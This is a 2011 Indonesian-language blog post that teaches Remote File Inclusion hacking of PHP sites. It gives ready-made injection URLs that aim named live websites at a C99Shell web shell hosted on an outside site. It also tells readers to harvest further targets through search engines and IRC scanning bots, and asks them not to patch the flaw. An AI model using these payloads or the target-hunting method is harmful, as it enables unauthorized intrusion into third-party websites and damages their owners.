Jumat, 04 Februari 2011

Belajar Hacking dengan RFI

Belajar RFI

Apakah itu RFI(Remote File Inclusion) ?
Intinya adalah suatu cara hacking(namanya ng-Inject**) untuk memanfaatkan kelemahan suatu website (Hole**)
dan membuat kita dapat memasukan/menghapus/mengakses(include**) file² di suatu website(target**)
karena di web tersebut terdapat file(PHP) yang menggunakan beberapa kode:

include();
include_once();
require();
require_once();

dan server tersebut masih menggunakan konfigurasi default. salah satu contohnya allow_url_include = on
#:-S
ini adalah contoh bugs dan injection
Injection C99Shell (New):
hxxp://lenceriaadanyeva.com/.pgp/priv??

Contoh1:
hxxp://www.[target].com/[bugsfile].php?[bugspath]=[Inject]

hxxp://www.ekipag.ru/index.php?DOCUMENT_ROOT=[Inject]

yang dinamakan target adalah >> hxxp://www.ekipag.ru
yang dinamakan Bugs adalah >> /?DOCUMENT_ROOT=

sekarang kita tinggal menggabungkan dengan script Injectionnya saja
Menjadi..
hxxp://www.ekipag.ru/index.php?DOCUMENT_ROOT=http://lenceriaadanyeva.com/.pgp/priv??


Contoh2:
hxxp://www.4gmoto.fr/index.php?page=[Inject]
Menjadi..
hxxp://www.4gmoto.fr/index.php?page=http://lenceriaadanyeva.com/.pgp/priv??

dari contoh tersebut terlihat isi file dan folder yang bisa kita access

---------------------------------------------------------------
untuk mencari target lain silahkan menggunakan search engine:
#:-S
google.com
ask.com
aol.com
live.com
yahoo.com
alltheweb.com
altavista.com
goodsearch.com
gigablast.com
rediff.com
euroseek.com
dll...

tapi jaman karang udah ada script yang automatis mencari ke search engine(BOT**) *-:) hihihi... jadi tidak perlu capek² mencari+mencoba secara manual target dari search engine.. -_-!
Bot biasa ada di server irc (mIRC)

/s irc.byroe.net 6667 (Byroe)
/s irc.nyubicrew.us 6667 (MILDnet)


Silahkan Mencoba...

(**) Bahasa baku yang digunakan "anak-anak nakal di dunia cyber" hihihi ;))
Note: tapi tidak semua website dapat dihack dengan cara ini.
-------------------------------------------------------------

Hacking is art soo keinginan belajar janganlah dihalangi oleh faktor ekonomi, tutorial ini hanya bertujuan untuk mengenal salah satu trick hacking dan belajar mengenal UNIX SYSTEM
untuk yang lain JANGAN mencoba mempatch/mengedit file bug ini..
kalau Bermanfaat Cendol yaa gan *-:) 8->
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)